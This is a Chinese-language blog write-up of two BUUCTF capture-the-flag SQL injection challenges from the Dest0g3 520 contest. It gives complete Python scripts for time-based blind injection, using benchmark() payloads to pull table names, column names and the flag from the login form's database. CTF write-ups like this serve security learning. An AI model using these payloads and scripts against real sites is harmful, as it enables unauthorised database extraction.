【BUU】[Dest0g3 520迎新赛]Really Easy SQL

已于 2024-09-05 10:23:58 修改
阅读量487 收藏 2
点赞数 12
分类专栏: CTF 文章标签: sql 数据库 ctf buu 信息安全 flag python脚本
于 2024-08-14 16:26:34 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_30817059/article/details/141194274
版权

[Dest0g3 520迎新赛]Really Easy SQL

信息搜集

题目标题说明是SQL注入
题目首页
image.png
页面title显示是钓鱼站点。

钓鱼站点主要为将我们的输入信息保存在数据库。后台应该是插入语句。

fuzz测试

这里无论输入什么都显示密码错误, 只能尝试盲注,基于时间的盲注,
这里经过测试payload如下,
image.png

写脚本

内容如下

import requests
import time
from urllib.parse import urlencode

url="http://c3a1a543-3a1c-4f1c-9e6b-1fd5fcf8b280.node5.buuoj.cn:81/"
flag=''
for i in range(1,44):
    for j in range(40,137):
        #payload="0'or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,j) #flaggg,user
        #payload="0'or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='flaggg')),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,j) #cmd
        payload="0'or(if((ascii(mid((select(cmd)from(flaggg)),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,j)
        data={
        'username': 'a',
        'password': payload
        }
        print(data)
        try:
           r = requests.post(url=url,data=data,timeout=0.2)
        except:
           flag += chr(j)
           print(flag)
           break
        
        time.sleep(0.2)
    time.sleep(1)

跑到flag。这道题目挺花时间的,主要在于sleep()函数被过滤了.如果在测试的过程中没有意识到这个问题,那么就会花费大量的时间。
image.png

成功解答

image.png

[Dest0g3 520迎新赛]easysql

信息搜集

这道题目页面和Really Easy SQL 一样,
在这里插入图片描述

解题-出错

尝试采用Really Easy SQL 脚本 跑一下。得到flag.
在这里插入图片描述

尝试提交-错误
在这里插入图片描述

修复问题

当我看到flag头跑出来的有个6的时候,我就知道这个脚本估计6了。。但是我还是抱有一丝幻想。。可惜结果打败了我的幻想。
修改下脚本,

import requests
import time
from urllib.parse import urlencode

url="http://5c202a9b-b9ac-42dc-b168-35922d0b016e.node5.buuoj.cn:81/"
flag=''
dict = "0123456789abcdefghijklmnopqrstuvwxyz-"
for i in range(1,44):
    for j in dict:
        #payload="0'or(if((ascii(mid((select(group_concat(table_name))from(information_schema.tables)where(table_schema=database())),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,j) #flaggg,user
        #payload="0'or(if((ascii(mid((select(group_concat(column_name))from(information_schema.columns)where(table_name='user')),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,j) #cmd
        payload="0'or(if((ascii(mid((select(cmd)from(flaggg)),{},1))={}),benchmark(2000000,md5(1)),0))or'".format(i,ord(j)) # flag{70e198ee-5b91-4ef3-8abe-af03cabc30a3}
        data={
        'username': 'a',
        'password': payload
        }
        #print(data)
        try:
           r = requests.post(url=url,data=data,timeout=0.2)
        except:
           flag += j
           print(flag)
           break
        
        time.sleep(0.2)
    time.sleep(1)

成功解答

结果
在这里插入图片描述
手动添加 {},不错。一开始脚本将a跑成了6 ,将e跑成了7
在这里插入图片描述

SwBack
关注
专栏目录
buu easysql(真的easy吗)
qq_46485934的博客
09-26 2098
这道题让我了解到了两个东西,堆叠注入和set sql_mode=PIPES_AS_CONCAT 一.分析回显 题目为easysql,所以这道题是sql注入题没跑了。按老规矩测试, 输入1,回显 Array ( [0] => 1 ) 输入2,3, 4, 5…,回显都为 Array ( [0] => 1 ) 于是,输入0试试,无回显 心里想(???,这不会是sql盲注吧,1及1以上有回显,0则无回显) 接着我就用burpsuite fuzz了一下,基本全被过滤,and or &&amp
[初级]sql注入之BUU SQL COURSE 1(爆库、表)
BlingZeng的博客
02-07 3836
这是一道选取自BUUCTF线上平台的sql注入题目,难度为初级。和大家一起学习分享
buuctf:Dest0g3 520迎新 web EasySSTI
qq_29060627的博客
06-10 913
python flask ssti绕过过滤注入 ctf web
Dest0g3 520迎新web&misc
weixin_63231007的博客
07-19 1808
Destog3 520迎新web&misc题目复现
Dest0g3 520迎新WEB 无java部分 wp
m0_52199518的博客
05-29 1518
Dest0g3 520迎新 只写了web,勉勉强强拿了总榜58名,web分榜11名这个尴尬的名次,前面的师傅太强了 phpdest <?php highlight_file(__FILE__); require_once 'flag.php'; if(isset($_GET['file'])) { require_once($_GET['file']); } 文件包含题,因为使用的是require_once(),所以不能直接读flag.php; 没有phpinfo信息,session没有开
Dest0g3 520迎新
XINO
06-10 342
这两天期末,发点存货 phpdest 文件竞争 EasyPHP 数报错然后输出 flag ctf[]=123 另一种方法 法二 最开始考虑的是无字母 rce,但发现或和异或都被 ban 了所以考虑—url取反绕过 funny_upload 对文件类型进行了检测,改为jpg文件后,又对文件内容进行了检测不能有...
[Writeup]BUU SQL COURSE1[入门级]
小飒的博客
06-08 714
观察网址,好像找到注入点 获得数据库 ctftraining获得表名 FLAG_TABLE获得列名 FLAG_COLUMN获得数据时发现数据是空的,只能想另外办法 看能不能登录news的数据库下找到 admin的密码:67fef29ef7beb75f567587f135fa26a0 获得flag payload: 使用sqlmap burp里直接可以找到注入点...
buu-[ACTF新生2020]easyre
qaq517384的博客
02-08 2448
查看文件信息 32位,UPX脱壳 查看main函数 int __cdecl main(int argc, const char **argv, const char **envp) { char v4; // [esp+12h] [ebp-2Eh] char v5; // [esp+13h] [ebp-2Dh] char v6; // [esp+14h] [ebp-2Ch] char v7; // [esp+15h] [ebp-2Bh] char v8; // [esp+16h] [e
BUU-Reveser-XMAN2018排位-easywasm(WebAssembly逆向分析)
05-26
在"BUU-Reveser-XMAN2018排位-easywasm(WebAssembly逆向分析)"这个挑战中,参者需要对名为"easywasm.wasm"的WASM文件进行逆向工程,理解其内部逻辑并可能找到隐藏的漏洞或解决方案。 WASM的主要特点包括: 1...
CTF真题-Dest0g3CTF2022招新
06-01
CTF真题-Dest0g3CTF2022招新,来自BUUCTF
【Web】Dest0g3 520迎新 题解(全)
uuzeray的博客
04-16 1629
通过故意将文件名和目录名混用,以及改变一个项目在文件系统中的类型(从文件到目录),来创建一个难以解压的ZIP文件。在Cookie处rO0A起手,明显是java序列化的base64编码,可以打入反序列化。打靶机,解压失败,但是其是在解压出部分文件后直接exit,从而绕过后续的unlink。这题估计也可以打php://input和日志包含,感兴趣可以试一试。生成的phar文件在010editor中打开,删去最后一个}D这个类对文件可以写可以读,用来打phar反序列化。访问/tmp/jyh.php回显404。
Dest0g3 520迎新 writeup by 树木
JEWSWS的博客
05-29 3741
信息 用户名:树木敲阔爱 类型:分榜前三 排名:25 MISC Welcome to fxxking DestCTF 关注微信公众号,得到flag Dest0g3{W31c0m3_t0_DestCTF2022!} Pngenius 题目是一张PNG图片,很难不让人联想到隐写术,我们使用stegsolve打开 在R0G0B0发现了Password for zip,猜测图片包含ZIP,使用foremost进行分解 分解后发现有密码,使用刚刚解出来的密码解压,得到flag
[Dest0g3 520迎新] Web部分wp
Sentiment的博客
06-06 1253
文件竞争 PHP 最新版的小 Trick,require_once 包含的软链接层数较多时 once 的 hash 匹配会直接失效造成重复包含 php源码分析 require_once 绕过不能重复包含文件的限制 - 安全客,安全资讯平台 (anquanke.com)也可以通过seesion文件包含 EasyPHP 设置了一个错误处理函数,只需要让他报错就能输出flag,这里用数组绕过即可payload: SimpleRCE 法一 hex2bin 绕过,大部分读取文件函数都过滤了,后来测试出一个head
Dest0g3 520迎新 WEB EasySSTI
qq_41696858的博客
06-06 557
SSTI
sqlalchemy JSON 字段写入时中文序列化问题
最新发布
llc的博客
09-12 363
_table_args__ = ({"comment": "表名称"})...extra = Column(JSON, comment="其他属性")...
BUU SQL COURSE
09-19
BUU SQL COURSE是一个SQL注入的实战演练平台。在这个平台上,你可以学习SQL注入的知识点,了解SQL注入的前置知识和一般测试步骤,并使用这些知识来解题。在注入过程中,一般需要找到注入点,闭合语句,带入语句进行...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

SwBack

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值